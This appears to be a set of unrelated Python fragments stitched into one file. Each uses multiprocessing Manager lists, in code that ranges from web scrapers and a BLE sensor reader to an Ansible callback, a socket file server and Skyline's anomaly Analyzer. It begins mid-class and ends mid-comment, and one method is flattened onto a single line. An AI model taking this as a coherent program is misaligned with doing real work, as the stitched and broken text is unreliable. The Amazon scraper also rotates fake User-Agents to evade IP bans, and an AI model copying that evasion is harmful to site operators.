        """Split ``text`` on non-word characters and return the distinct non-empty words."""
        return [word for word in set(re.split(r'\W| ', text)) if word]

    def analyzer(self, index_process):
        """Build the word lists for the topic group assigned to ``index_process``."""
        first = self.size_group * index_process
        for i in range(first, first + self.size_group):
            if i >= len(self.topic_lst):
                continue
            topic_dir = self.path_to_data + '/' + self.topic_lst[i]
            chunks = []
            for text in os.listdir(topic_dir):
                with open(topic_dir + '/' + text, 'r') as file:
                    chunks.append(file.read().lower())
            self.global_lst[i] = self._unique_words("".join(chunks))

    def determine_topic(self, filename):
        """Return the topic whose word list shares the most words with ``filename``."""
        with open(filename, 'r') as file:
            words = set(self._unique_words(file.read().lower()))

        scores = []
        for index_topic in range(len(self.topic_lst)):
            known = self.global_lst[index_topic]
            # Number of the topic's words that also occur in the file.
            scores.append(len(known) - len(set(known) - words))
        return self.topic_lst[scores.index(max(scores))]

    def start_process(self):
        """Run ``analyzer`` in ``num_proc`` processes and wait for all of them."""
        proc_lst = [
            Process(target=self.analyzer, args=(index, ))
            for index in range(self.num_proc)
        ]
        for proc in proc_lst:
            proc.start()
        for proc in proc_lst:
            proc.join()
def _fit(self, input_data: InputData, use_fitted_operations=False, process_state_dict: Manager = None, fitted_operations: Manager = None): """ Run training process in all nodes in pipeline starting with root. :param input_data: data used for operation training :param use_fitted_operations: flag defining whether use saved information about previous executions or not, default True :param process_state_dict: this dictionary is used for saving required pipeline parameters (which were changed inside the process) in a case of operation fit time control (when process created) :param fitted_operations: this list is used for saving fitted operations of pipeline nodes """ # InputData was set directly to the primary nodes if input_data is None: use_fitted_operations = False else: use_fitted_operations = self._fitted_status_if_new_data( new_input_data=input_data, fitted_status=use_fitted_operations) if not use_fitted_operations or not self.fitted_on_data: # Don't use previous information self.unfit() self.update_fitted_on_data(input_data) with Timer(log=self.log) as t: computation_time_update = not use_fitted_operations or not self.root_node.fitted_operation or \ self.computation_time is None train_predicted = self.root_node.fit(input_data=input_data) if computation_time_update: self.computation_time = round(t.minutes_from_start, 3) if process_state_dict is None: return train_predicted else: process_state_dict['train_predicted'] = train_predicted process_state_dict['computation_time'] = self.computation_time process_state_dict['fitted_on_data'] = self.fitted_on_data for node in self.nodes: fitted_operations.append(node.fitted_operation)
class Parallel(object):
    """Apply an objective to every item of an iterable in a process pool.

    The objective is called as ``objective(item, **objective_kwargs)`` and is
    expected to return a dict or a list of dicts; all returned dicts are
    collected into one list.
    """

    def __init__(self, objective, objective_kwargs):
        self.objective = objective
        self.objective_kwargs = objective_kwargs
        return

    def run(self, iterable_obj, n_jobs=-1):
        """Run the objective over ``iterable_obj`` and return the collected results.

        :param iterable_obj: items to process
        :param n_jobs: number of worker processes; -1 uses every CPU
        :return: list of the collected results
        :raises Exception: when ``iterable_obj`` is not iterable or a worker fails
        """
        try:
            iter(iterable_obj)
        except Exception as e:
            raise Exception(str(e)) from e
        self.X = Manager().list()
        if n_jobs == -1:
            import multiprocessing
            n_jobs = multiprocessing.cpu_count()
        pool = Pool(n_jobs)
        try:
            pool.starmap(self.worker, [(item, ) for item in iterable_obj])
            pool.close()
        except Exception:
            # Do not leave worker processes behind when a task fails.
            pool.terminate()
            raise
        finally:
            pool.join()
        return list(self.X)

    def worker(self, item):
        """Call the objective for ``item`` and store what it returns.

        A dict is stored as one result, a list contributes each of its
        elements, and any other return value is ignored.

        :raises Exception: when the objective or the storing fails; the
            message names the item and the original error
        """
        try:
            d_ = self.objective(item, **self.objective_kwargs)
            if isinstance(d_, dict):
                self.X.append(d_)
            elif isinstance(d_, list):
                self.X.extend(d_)
            # Other return types are skipped: the objective did not return
            # a dict or a list of dicts.
        except Exception as e:
            raise Exception('objective failed for item {!r}: {!r}'.format(
                item, e)) from e
def amazon_scrape_to_df_multithreading(keyword):
    """
    Function:
    ---------
        (1) Calls amazon_df_one_asin for every ASIN found for the keyword, in a process pool,
            and combines the per-ASIN results into one pandas DataFrame
        (2) The combined DataFrame is also saved as a pickle file, for caching purposes.

    Args:
    -----
        (1) keyword (str): Search term defined by the user

    Returns:
    --------
        output_df (pandas DataFrame): combined reviews; empty when no ASIN was found.
        Per the original notes the columns are:
            (a) Name (b) Rating (c) User Comment (d) Date (e) Brand (f) Usefulness (g) Source
    """
    # Fake User Agent library is used, so that the User Agent is randomized, so as to be able to circumvent IP bans.
    # It will make the code run slightly slower, but we are able to yield better results.
    ua = UserAgent(cache=False, verify_ssl=False)
    list_of_asin = amazon_get_asin(keyword, ua.random)
    print("{} products found... ".format(str(len(list_of_asin))))
    list_of_asin_and_ua = [(asin, ua.random) for asin in list_of_asin]

    with Pool(processes=cpu_count() * 2) as pool:
        review_dfs = pool.starmap(amazon_df_one_asin, list_of_asin_and_ua)
        pool.close()
        pool.join()

    # starmap already returns the list of per-ASIN frames; concatenate it
    # directly (list.append returns None, so its result must not be reused).
    if review_dfs:
        output_df = pd.concat(review_dfs, ignore_index=True)
    else:
        # pd.concat rejects an empty list
        output_df = pd.DataFrame()

    with open('pickle_files/amazon_web_scrape.pickle', 'wb') as handle:
        pickle.dump(output_df, handle, protocol=pickle.HIGHEST_PROTOCOL)
    return output_df
def _get_ruuvitag_datas(macs=[],
                        search_duratio_sec=None,
                        run_flag=RunFlag(),
                        bt_device=''):
    """
    Read advertisements from ``ble.get_datas`` and yield the decoded ones.

    Args:
        macs (list): MAC whitelist. Empty means no filtering
        search_duratio_sec (int): Stop after this many seconds. None means no limit
        run_flag (object): Iteration stops once ``run_flag.running`` is false
        bt_device (string): Bluetooth device id passed to ``ble.get_datas``

    Yields:
        tuple: MAC and decoded sensor data
    """
    mac_blacklist = Manager().list()
    start_time = time.time()
    data_iter = ble.get_datas(mac_blacklist, bt_device)

    for ble_data in data_iter:
        # Stop on timeout
        timed_out = search_duratio_sec and \
            time.time() - start_time > search_duratio_sec
        if timed_out:
            data_iter.send(StopIteration)
            break
        # Stop when the caller cleared the running flag
        if not run_flag.running:
            data_iter.send(StopIteration)
            break
        # Whitelist check
        if macs and not ble_data[0] in macs:
            continue

        (data_format, data) = DataFormats.convert_data(ble_data[1])
        if data is None:
            # Not convertible: blacklist the sender
            mac_blacklist.append(ble_data[0])
            continue

        state = get_decoder(data_format).decode_data(data)
        if state is None:
            log.error('Decoded data is null. MAC: %s - Raw: %s', ble_data[0],
                      ble_data[1])
            continue
        yield (ble_data[0], state)
class JobManager(threading.Thread):
    """Background thread that calls ``dispatch()`` periodically and tracks jobs in progress."""

    def __init__(self, num_workers, worker_name):
        super(JobManager, self).__init__(name=worker_name)
        self.pool = Pool(num_workers=num_workers, name=worker_name)
        if os.name != 'nt':
            # Manager-backed state everywhere except on Windows.
            self.in_progress_jobs = Manager().list()
            self.lock = Manager().Lock()
        else:
            self.in_progress_jobs = []
            self.lock = threading.RLock()

    def run(self):
        """Sleep 20 seconds, dispatch, repeat forever; errors are printed, not raised."""
        while True:
            try:
                time.sleep(20)
                self.dispatch()
            except Exception:
                # Print to debug console instead of to DB.
                import traceback
                print(traceback.format_exc())

    def dispatch(self):
        raise NotImplementedError("Children must override dispatch()")

    def submit_job(self, work_unit):
        """Submit ``work_unit`` unless a unit with the same key is in progress.

        Returns True when the unit was handed to the pool, False when its
        key is already registered.
        """
        with self.lock:
            already_running = (work_unit.get_unique_key()
                               in self.in_progress_jobs)
            if already_running:
                return False
            self.in_progress_jobs.append(work_unit.get_unique_key())

            # Give the unit access to the shared list and lock.
            work_unit.in_progress_jobs = self.in_progress_jobs
            work_unit.lock = self.lock
            self.pool.submit(work_unit)
        return True
class CallbackModule(object):
    """Callback plugin that collects per-host task results and prints a JSON report.

    Each ``runner_on_*`` hook appends one ``{"host", "res", "status"}`` record
    to ``result_list``; ``playbook_on_stats`` groups those records and prints
    them together with the per-host summaries.
    """

    def __init__(self):
        """Read ``MY_JOB_ID`` from the environment and create the result list.

        Raises:
            KeyError: if ``MY_JOB_ID`` is not set in the environment.
        """
        self.job_id = os.environ['MY_JOB_ID']
        self.result_list = Manager().list()

    def _record(self, host, res, status):
        """Append one result record for ``host`` with the given ``status``."""
        self.result_list.append({"host": host, "res": res, "status": status})

    def playbook_on_start(self):
        """Nothing to do when the playbook starts."""
        pass

    def runner_on_failed(self, host, res, ignore_errors=False):
        """Record a failed task; ``ignore_errors`` is accepted but not used."""
        self._record(host, res, "failures")

    def runner_on_ok(self, host, res):
        """Record a successful task."""
        self._record(host, res, "ok")

    def runner_on_skipped(self, host, item=None):
        """Record a skipped task with an empty result; ``item`` is not used."""
        self._record(host, '', "skipped")

    def runner_on_unreachable(self, host, res):
        """Record a task whose host was unreachable."""
        self._record(host, res, "unreachable")

    def playbook_on_stats(self, stats):
        """Print the collected results as pretty-printed JSON on stdout.

        The output has two keys: ``summary`` maps every host in
        ``stats.processed`` to ``stats.summarize(host)``, and ``task_summary``
        maps host -> status -> list of recorded results.
        """
        summary = {}
        for host in stats.processed.keys():
            summary[host] = stats.summarize(host)

        task_summary = defaultdict(lambda: defaultdict(list))
        for record in self.result_list:
            task_summary[record["host"]][record["status"]].append(record["res"])

        result = {"summary": summary, "task_summary": task_summary}
        # print() call form with a single argument behaves the same on
        # Python 2 and Python 3; the former print statement was a syntax
        # error on Python 3.
        print(json.dumps(result, sort_keys=True, indent=4, separators=(',', ': ')))
def run(self):
    """Fetch every district page in a process pool and collect the rows.

    One ``thread(district, url, result_list)`` task is scheduled per entry of
    ``self.__href_d``; errors raised by a task are passed to ``println``.
    After the pool has finished, ``self.__city_data`` is appended as the last
    row.

    :return: ``[]`` when there are no districts, otherwise the shared result
             list (a ``Manager().list()`` proxy)
    """
    district_count = len(self.__href_d)
    if district_count == 0:
        return []

    result_list = Manager().list()
    pool = Pool(min(cpu_count() * 4, district_count))
    for district, href in self.__href_d.items():
        pool.apply_async(
            thread,
            args=(district, urljoin(self.url, href), result_list),
            error_callback=lambda e: println(e),
        )
    pool.close()
    pool.join()

    result_list.append(self.__city_data)

    # The frame itself is not returned; building it and assigning the 17
    # column names raises if the collected rows do not have that many columns.
    df = pd.DataFrame(result_list)
    df.columns = [
        "省", "市", "区",
        "住宅:二手房:价格", "住宅:二手房:环比",
        '住宅+新楼盘+价格', '住宅+新楼盘+环比',
        "住宅:出租:价格", "住宅:出租:环比",
        "商铺:二手房:价格", "商铺:二手房:环比",
        "商铺:出租:价格", "商铺:出租:环比",
        "办公:二手房:价格", "办公:二手房:环比",
        "办公:出租:价格", "办公:出租:环比",
    ]
    return result_list
class ParserWorld:
    """Scrape one index quote per configured currency, one process each."""

    def __init__(self, conf: dict):
        """Store the target URL and currency list from ``conf``.

        ``conf`` must provide the keys ``'url'`` and ``'currency'``.
        """
        self.url = conf['url']
        self.currency = conf['currency']
        self.table = 'index'
        # Manager-backed list so child processes can append to it
        self.items = Manager().list()

    def parse(self, curr):
        """Fetch and parse the page for ``curr`` and append one item.

        ``curr`` is a whitespace-separated ``"<symbol> <name>"`` string.
        """
        symbol, name = curr.split()
        html = requests.get(self.url, {"symbol": symbol}).text
        soup = BeautifulSoup(html, "html.parser")
        body = soup.find('table', id='dayTable').find('tbody')

        price = body.find('span').text
        status = add_status(
            body.find('tr').attrs['class'][0],
            body.find('span', class_='point_status').text,
            "point_dn",
        )
        plain_price = price.replace(",", "")

        self.items.append(dict(
            name=name,
            date=convert_datetime_string(body.find('td').text),
            price=plain_price,
            status=status,
            rate=calculate_ratio(status, plain_price),
        ))

    def get_items(self) -> List[dict]:
        """Run ``parse`` for every currency in parallel and return the items.

        The returned object is ``self.items`` itself, so results accumulate
        across calls.
        """
        workers = [Process(target=self.parse, args=(curr, )) for curr in self.currency]
        for worker in workers:
            worker.start()
        for worker in workers:
            worker.join()
        return self.items
class JobProcess(multiprocessing.Process):
    """Process that runs ``thread_count`` WorkThread jobs against one URL."""

    def __init__(self, thread_count, url, extime):
        """
        :param thread_count: number of WorkThread instances to run
        :param url: passed to every WorkThread
        :param extime: seconds to sleep before starting; negative values are
                       treated as 0
        """
        multiprocessing.Process.__init__(self)
        self.thread_count = thread_count
        self.url = url
        self.extime = max(extime, 0) if extime < 0 else extime
        # Shared lists are needed here; with plain lists both counters would
        # always read 0 from the parent process.
        self.success = Manager().list()
        self.failure = Manager().list()

    def run(self):
        """Sleep ``extime`` seconds, then run the workers and sort results.

        Each worker is started and joined before the next one starts, so the
        workers execute one after another.
        """
        time.sleep(self.extime)
        workers = [WorkThread(self.url) for _ in range(self.thread_count)]
        for worker in workers:
            worker.start()
            worker.join()
            bucket = self.success if worker.get_result() else self.failure
            bucket.append(worker.get_result())

    def get_success_count(self):
        """Return how many workers produced a truthy result."""
        return len(self.success)

    def get_failure_count(self):
        """Return how many workers produced a falsy result."""
        return len(self.failure)
def single_process(single_ip, single_port):
    """Accept TCP clients forever and queue their requests for two helper processes.

    A request is read until a chunk containing ``"\\r\\n"`` arrives. The request
    ``list`` queues the client socket for ``sp_show_list``; anything else is
    treated as a file path and queued, with the socket, for
    ``single_process_server``. Clients that close before sending a terminator
    are dropped.

    :param single_ip: address to bind to
    :param single_port: port to bind to
    """
    server_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server_sock.bind((single_ip, single_port))
    server_sock.listen(1024)
    print(f'Serving on {single_ip,str(single_port)}')

    # Shared queues consumed by the helper processes
    cli_list = Manager().list()
    path_list = Manager().list()
    cli_list_list = Manager().list()

    file_worker = Process(target=single_process_server, args=(cli_list, path_list, ))
    list_worker = Process(target=sp_show_list, args=(cli_list_list, ))
    file_worker.start()
    list_worker.start()

    while True:
        cli_sock, cli_addr = server_sock.accept()

        chunks = []
        peer_closed = False
        while True:
            piece = cli_sock.recv(1024).decode("utf-8")
            if "\r\n" in piece:
                chunks.append(piece)
                break
            if piece == "":
                peer_closed = True
                break
            chunks.append(piece)

        if peer_closed:
            cli_sock.close()
            continue

        # Drop the last two characters (the terminator, when it ends the data)
        data = "".join(chunks)[:-2]
        print(f"Received {data!r} from {cli_addr!r}")

        if data == "list":
            cli_list_list.append(cli_sock)
            continue

        cli_list.append(cli_sock)
        path_list.append(data)
class Analyzer(Thread):
    """
    The Analyzer class which controls the analyzer thread and spawned processes.
    """

    def __init__(self, parent_pid):
        """
        Initialize the Analyzer

        Create the :obj:`self.anomalous_metrics` list

        Create the :obj:`self.exceptions_q` queue

        Create the :obj:`self.anomaly_breakdown_q` queue

        Create the :obj:`self.mirage_metrics` list

        :param parent_pid: pid of the parent process; checked by
            :meth:`check_if_parent_is_alive`
        """
        super(Analyzer, self).__init__()
        self.redis_conn = StrictRedis(unix_socket_path=settings.REDIS_SOCKET_PATH)
        self.daemon = True
        self.parent_pid = parent_pid
        self.current_pid = getpid()
        self.anomalous_metrics = Manager().list()
        self.exceptions_q = Queue()
        self.anomaly_breakdown_q = Queue()
        self.mirage_metrics = Manager().list()

    def check_if_parent_is_alive(self):
        """
        Exit with status 0 if signalling either this process or the parent
        process with signal 0 fails.
        """
        try:
            kill(self.current_pid, 0)
            kill(self.parent_pid, 0)
        except:
            exit(0)

    def spin_process(self, i, unique_metrics):
        """
        Assign a bunch of metrics for a process to analyze.

        Multiple get the assigned_metrics to the process from Redis.

        For each metric:

        - unpack the `raw_timeseries` for the metric.
        - Analyse each timeseries against `ALGORITHMS` to determine if it is
          anomalous.
        - If anomalous add it to the :obj:`self.anomalous_metrics` list
        - Add what algorithms triggered to the :obj:`self.anomaly_breakdown_q`
          queue
        - If :mod:`settings.PANORAMA_ENABLED` is ``True``:

          - Add a panorama check file with the details about the anomaly.

        - If :mod:`settings.ENABLE_CRUCIBLE` and
          :mod:`settings.ANALYZER_CRUCIBLE_ENABLED` are ``True``:

          - Add a crucible data file with the details about the timeseries and
            anomaly.
          - Write the timeseries to a json file for crucible.

        Add keys and values to the queue so the parent process can collate for:\n
        * :py:obj:`self.anomaly_breakdown_q`
        * :py:obj:`self.exceptions_q`

        :param i: 1-based index of this worker
        :param unique_metrics: list of all metric keys; this worker analyses
            its slice of it
        """
        spin_start = time()
        logger.info('spin_process started')

        # Discover assigned metrics
        keys_per_processor = int(ceil(float(len(unique_metrics)) / float(settings.ANALYZER_PROCESSES)))
        if i == settings.ANALYZER_PROCESSES:
            assigned_max = len(unique_metrics)
        else:
            assigned_max = min(len(unique_metrics), i * keys_per_processor)
        # Fix analyzer worker metric assignment #94
        # https://github.com/etsy/skyline/pull/94 @languitar:worker-fix
        assigned_min = (i - 1) * keys_per_processor
        assigned_keys = range(assigned_min, assigned_max)

        # Compile assigned metrics
        assigned_metrics = [unique_metrics[index] for index in assigned_keys]

        # Check if this process is unnecessary
        if len(assigned_metrics) == 0:
            return

        # Multi get series
        raw_assigned = self.redis_conn.mget(assigned_metrics)

        # Make process-specific dicts
        exceptions = defaultdict(int)
        anomaly_breakdown = defaultdict(int)

        # Distill timeseries strings into lists
        for i, metric_name in enumerate(assigned_metrics):
            self.check_if_parent_is_alive()

            try:
                raw_series = raw_assigned[i]
                unpacker = Unpacker(use_list=False)
                unpacker.feed(raw_series)
                timeseries = list(unpacker)

                anomalous, ensemble, datapoint = run_selected_algorithm(timeseries, metric_name)

                # If it's anomalous, add it to list
                if anomalous:
                    base_name = metric_name.replace(settings.FULL_NAMESPACE, '', 1)
                    metric = [datapoint, base_name]
                    self.anomalous_metrics.append(metric)

                    # Get the anomaly breakdown - who returned True?
                    triggered_algorithms = []
                    for index, value in enumerate(ensemble):
                        if value:
                            algorithm = settings.ALGORITHMS[index]
                            anomaly_breakdown[algorithm] += 1
                            triggered_algorithms.append(algorithm)

                    # If Crucible or Panorama are enabled determine details
                    determine_anomaly_details = False
                    if settings.ENABLE_CRUCIBLE and settings.ANALYZER_CRUCIBLE_ENABLED:
                        determine_anomaly_details = True
                    if settings.PANORAMA_ENABLED:
                        determine_anomaly_details = True

                    if determine_anomaly_details:
                        metric_timestamp = str(int(timeseries[-1][0]))
                        from_timestamp = str(int(timeseries[1][0]))
                        timeseries_dir = base_name.replace('.', '/')

                    # If Panorama is enabled - create a Panorama check
                    if settings.PANORAMA_ENABLED:
                        if not os.path.exists(settings.PANORAMA_CHECK_PATH):
                            # Octal literal: int('0755') is decimal 755,
                            # which is not the rwxr-xr-x mode intended.
                            os.makedirs(settings.PANORAMA_CHECK_PATH, 0o755)

                        # Note:
                        # The values are enclosed is single quoted intentionally
                        # as the imp.load_source used results in a shift in the
                        # decimal position when double quoted, e.g.
                        # value = "5622.0" gets imported as
                        # 2016-03-02 12:53:26 :: 28569 :: metric variable - value - 562.2
                        # single quoting results in the desired,
                        # 2016-03-02 13:16:17 :: 1515 :: metric variable - value - 5622.0
                        added_at = str(int(time()))
                        source = 'graphite'
                        panaroma_anomaly_data = 'metric = \'%s\'\n' \
                                                'value = \'%s\'\n' \
                                                'from_timestamp = \'%s\'\n' \
                                                'metric_timestamp = \'%s\'\n' \
                                                'algorithms = %s\n' \
                                                'triggered_algorithms = %s\n' \
                                                'app = \'%s\'\n' \
                                                'source = \'%s\'\n' \
                                                'added_by = \'%s\'\n' \
                                                'added_at = \'%s\'\n' \
                            % (base_name, str(datapoint), from_timestamp,
                               metric_timestamp, str(settings.ALGORITHMS),
                               triggered_algorithms, skyline_app, source,
                               this_host, added_at)

                        # Create an anomaly file with details about the anomaly
                        panaroma_anomaly_file = '%s/%s.%s.txt' % (
                            settings.PANORAMA_CHECK_PATH, added_at,
                            base_name)
                        try:
                            write_data_to_file(
                                skyline_app, panaroma_anomaly_file, 'w',
                                panaroma_anomaly_data)
                            logger.info('added panorama anomaly file :: %s' % (panaroma_anomaly_file))
                        except:
                            logger.error('error :: failed to add panorama anomaly file :: %s' % (panaroma_anomaly_file))
                            logger.info(traceback.format_exc())

                    # If Crucible is enabled - save timeseries and create a
                    # Crucible check
                    if settings.ENABLE_CRUCIBLE and settings.ANALYZER_CRUCIBLE_ENABLED:
                        crucible_anomaly_dir = settings.CRUCIBLE_DATA_FOLDER + '/' + timeseries_dir + '/' + metric_timestamp
                        if not os.path.exists(crucible_anomaly_dir):
                            os.makedirs(crucible_anomaly_dir, 0o755)

                        # Note:
                        # The values are enclosed is single quoted intentionally
                        # as the imp.load_source used in crucible results in a
                        # shift in the decimal position when double quoted, e.g.
                        # value = "5622.0" gets imported as
                        # 2016-03-02 12:53:26 :: 28569 :: metric variable - value - 562.2
                        # single quoting results in the desired,
                        # 2016-03-02 13:16:17 :: 1515 :: metric variable - value - 5622.0
                        crucible_anomaly_data = 'metric = \'%s\'\n' \
                                                'value = \'%s\'\n' \
                                                'from_timestamp = \'%s\'\n' \
                                                'metric_timestamp = \'%s\'\n' \
                                                'algorithms = %s\n' \
                                                'triggered_algorithms = %s\n' \
                                                'anomaly_dir = \'%s\'\n' \
                                                'graphite_metric = True\n' \
                                                'run_crucible_tests = False\n' \
                                                'added_by = \'%s\'\n' \
                                                'added_at = \'%s\'\n' \
                            % (base_name, str(datapoint), from_timestamp,
                               metric_timestamp, str(settings.ALGORITHMS),
                               triggered_algorithms, crucible_anomaly_dir,
                               skyline_app, metric_timestamp)

                        # Create an anomaly file with details about the anomaly
                        crucible_anomaly_file = '%s/%s.txt' % (crucible_anomaly_dir, base_name)
                        try:
                            write_data_to_file(
                                skyline_app, crucible_anomaly_file, 'w',
                                crucible_anomaly_data)
                            logger.info('added crucible anomaly file :: %s' % (crucible_anomaly_file))
                        except:
                            logger.error('error :: failed to add crucible anomaly file :: %s' % (crucible_anomaly_file))
                            logger.info(traceback.format_exc())

                        # Create timeseries json file with the timeseries
                        json_file = '%s/%s.json' % (crucible_anomaly_dir, base_name)
                        timeseries_json = str(timeseries).replace('[', '(').replace(']', ')')
                        try:
                            write_data_to_file(skyline_app, json_file, 'w', timeseries_json)
                            logger.info('added crucible timeseries file :: %s' % (json_file))
                        except:
                            logger.error('error :: failed to add crucible timeseries file :: %s' % (json_file))
                            logger.info(traceback.format_exc())

                        # Create a crucible check file
                        crucible_check_file = '%s/%s.%s.txt' % (settings.CRUCIBLE_CHECK_PATH, metric_timestamp, base_name)
                        try:
                            write_data_to_file(
                                skyline_app, crucible_check_file, 'w',
                                crucible_anomaly_data)
                            logger.info('added crucible check :: %s,%s' % (base_name, metric_timestamp))
                        except:
                            logger.error('error :: failed to add crucible check file :: %s' % (crucible_check_file))
                            logger.info(traceback.format_exc())

            # It could have been deleted by the Roomba
            except TypeError:
                exceptions['DeletedByRoomba'] += 1
            except TooShort:
                exceptions['TooShort'] += 1
            except Stale:
                exceptions['Stale'] += 1
            except Boring:
                exceptions['Boring'] += 1
            except:
                exceptions['Other'] += 1
                logger.info(traceback.format_exc())

        # Add values to the queue so the parent process can collate
        for key, value in anomaly_breakdown.items():
            self.anomaly_breakdown_q.put((key, value))

        for key, value in exceptions.items():
            self.exceptions_q.put((key, value))

        spin_end = time() - spin_start
        logger.info('spin_process took %.2f seconds' % spin_end)

    def run(self):
        """
        - Called when the process intializes.

        - Determine if Redis is up and discover the number of `unique metrics`.

        - Divide the `unique_metrics` between the number of `ANALYZER_PROCESSES`
          and assign each process a set of metrics to analyse for anomalies.

        - Wait for the processes to finish.

        - Determine whether if any anomalous metrics require:

            - Alerting on (and set `EXPIRATION_TIME` key in Redis for alert).
            - Feed to another module e.g. mirage.
            - Alert to syslog.

        - Populate the webapp json with the anomalous_metrics details.

        - Log the details about the run to the skyline analyzer log.

        - Send skyline.analyzer metrics to `GRAPHITE_HOST`
        """

        # Log management to prevent overwriting
        # Allow the bin/<skyline_app>.d to manage the log
        if os.path.isfile(skyline_app_logwait):
            try:
                os.remove(skyline_app_logwait)
            except OSError:
                logger.error('error - failed to remove %s, continuing' % skyline_app_logwait)
                pass

        # Wait up to 5 seconds for the log lock file to disappear
        now = time()
        log_wait_for = now + 5
        while now < log_wait_for:
            if os.path.isfile(skyline_app_loglock):
                sleep(.1)
                now = time()
            else:
                now = log_wait_for + 1

        logger.info('starting %s run' % skyline_app)
        if os.path.isfile(skyline_app_loglock):
            logger.error('error - bin/%s.d log management seems to have failed, continuing' % skyline_app)
            try:
                os.remove(skyline_app_loglock)
                logger.info('log lock file removed')
            except OSError:
                logger.error('error - failed to remove %s, continuing' % skyline_app_loglock)
                pass
        else:
            logger.info('bin/%s.d log management done' % skyline_app)

        if not os.path.exists(settings.SKYLINE_TMP_DIR):
            # Octal literal works on Python 2.6+ and 3; see spin_process.
            os.makedirs(settings.SKYLINE_TMP_DIR, 0o755)

        # Initiate the algorithm timings if Analyzer is configured to send the
        # algorithm_breakdown metrics with ENABLE_ALGORITHM_RUN_METRICS
        algorithm_tmp_file_prefix = settings.SKYLINE_TMP_DIR + '/' + skyline_app + '.'
        algorithms_to_time = []
        if send_algorithm_run_metrics:
            algorithms_to_time = settings.ALGORITHMS

        while 1:
            now = time()

            # Make sure Redis is up
            try:
                self.redis_conn.ping()
            except:
                logger.error('skyline can\'t connect to redis at socket path %s' % settings.REDIS_SOCKET_PATH)
                sleep(10)
                self.redis_conn = StrictRedis(unix_socket_path=settings.REDIS_SOCKET_PATH)
                continue

            # Report app up
            self.redis_conn.setex(skyline_app, 120, now)

            # Discover unique metrics
            unique_metrics = list(self.redis_conn.smembers(settings.FULL_NAMESPACE + 'unique_metrics'))

            if len(unique_metrics) == 0:
                logger.info('no metrics in redis. try adding some - see README')
                sleep(10)
                continue

            # Using count files rather that multiprocessing.Value to enable metrics for
            # metrics for algorithm run times, etc
            # Opening with 'w' truncates (or creates) the files for this run.
            for algorithm in algorithms_to_time:
                algorithm_count_file = algorithm_tmp_file_prefix + algorithm + '.count'
                algorithm_timings_file = algorithm_tmp_file_prefix + algorithm + '.timings'
                # with open(algorithm_count_file, 'a') as f:
                with open(algorithm_count_file, 'w') as f:
                    pass
                with open(algorithm_timings_file, 'w') as f:
                    pass

            # Remove any existing algorithm.error files from any previous runs
            # that did not cleanup for any reason
            pattern = '%s.*.algorithm.error' % skyline_app
            try:
                for f in os.listdir(settings.SKYLINE_TMP_DIR):
                    if re.search(pattern, f):
                        try:
                            os.remove(os.path.join(settings.SKYLINE_TMP_DIR, f))
                            logger.info('cleaning up old error file - %s' % (str(f)))
                        except OSError:
                            pass
            except:
                logger.error('failed to cleanup algorithm.error files ' + traceback.format_exc())

            # Spawn processes
            pids = []
            spawned_pids = []
            pid_count = 0
            for i in range(1, settings.ANALYZER_PROCESSES + 1):
                if i > len(unique_metrics):
                    logger.info('WARNING: skyline is set for more cores than needed.')
                    break

                p = Process(target=self.spin_process, args=(i, unique_metrics))
                pids.append(p)
                pid_count += 1
                logger.info('starting %s of %s spin_process/es' % (str(pid_count), str(settings.ANALYZER_PROCESSES)))
                p.start()
                spawned_pids.append(p.pid)

            # Send wait signal to zombie processes
            # for p in pids:
            #     p.join()
            # Self monitor processes and terminate if any spin_process has run
            # for longer than 180 seconds - 20160512 @earthgecko
            p_starts = time()
            while time() - p_starts <= settings.MAX_ANALYZER_PROCESS_RUNTIME:
                if any(p.is_alive() for p in pids):
                    # Just to avoid hogging the CPU
                    sleep(.1)
                else:
                    # All the processes are done, break now.
                    time_to_run = time() - p_starts
                    logger.info('%s :: %s spin_process/es completed in %.2f seconds' % (skyline_app, str(settings.ANALYZER_PROCESSES), time_to_run))
                    break
            else:
                # We only enter this if we didn't 'break' above.
                logger.info('%s :: timed out, killing all spin_process processes' % (skyline_app))
                for p in pids:
                    p.terminate()
                    p.join()

            # Log the last reported error by any algorithms that errored in the
            # spawned processes from algorithms.py
            for completed_pid in spawned_pids:
                logger.info('spin_process with pid %s completed' % (str(completed_pid)))
                for algorithm in settings.ALGORITHMS:
                    algorithm_error_file = '%s/%s.%s.%s.algorithm.error' % (
                        settings.SKYLINE_TMP_DIR, skyline_app,
                        str(completed_pid), algorithm)
                    if os.path.isfile(algorithm_error_file):
                        logger.info(
                            'error - spin_process with pid %s has reported an error with the %s algorithm' % (
                                str(completed_pid), algorithm))
                        try:
                            with open(algorithm_error_file, 'r') as f:
                                error_string = f.read()
                            logger.error('%s' % str(error_string))
                        except:
                            logger.error('failed to read %s error file' % algorithm)
                        try:
                            os.remove(algorithm_error_file)
                        except OSError:
                            pass

            # Grab data from the queue and populate dictionaries
            exceptions = dict()
            anomaly_breakdown = dict()
            while 1:
                try:
                    key, value = self.anomaly_breakdown_q.get_nowait()
                    if key not in anomaly_breakdown.keys():
                        anomaly_breakdown[key] = value
                    else:
                        anomaly_breakdown[key] += value
                except Empty:
                    break

            while 1:
                try:
                    key, value = self.exceptions_q.get_nowait()
                    if key not in exceptions.keys():
                        exceptions[key] = value
                    else:
                        exceptions[key] += value
                except Empty:
                    break

            # Send alerts
            if settings.ENABLE_ALERTS:
                for alert in settings.ALERTS:
                    for metric in self.anomalous_metrics:
                        ALERT_MATCH_PATTERN = alert[0]
                        METRIC_PATTERN = metric[1]
                        alert_match_pattern = re.compile(ALERT_MATCH_PATTERN)
                        pattern_match = alert_match_pattern.match(METRIC_PATTERN)
                        if pattern_match:
                            cache_key = 'last_alert.%s.%s' % (alert[1], metric[1])
                            try:
                                last_alert = self.redis_conn.get(cache_key)
                                if not last_alert:
                                    # Any failure in this inner block (for
                                    # example alert[3] missing from the alert
                                    # tuple) falls through to a plain alert
                                    # in the except branch.
                                    try:
                                        SECOND_ORDER_RESOLUTION_FULL_DURATION = alert[3]
                                        logger.info('mirage check :: %s' % (metric[1]))
                                        # Write anomalous metric to test at second
                                        # order resolution by crucible to the check
                                        # file
                                        metric_timestamp = int(time())
                                        anomaly_check_file = '%s/%s.%s.txt' % (settings.MIRAGE_CHECK_PATH, metric_timestamp, metric[1])
                                        with open(anomaly_check_file, 'w') as fh:
                                            # metric_name, anomalous datapoint, hours to resolve, timestamp
                                            fh.write('metric = "%s"\nvalue = "%s"\nhours_to_resolve = "%s"\nmetric_timestamp = "%s"\n' % (metric[1], metric[0], alert[3], metric_timestamp))
                                        # os.chmod needs an integer mode. The
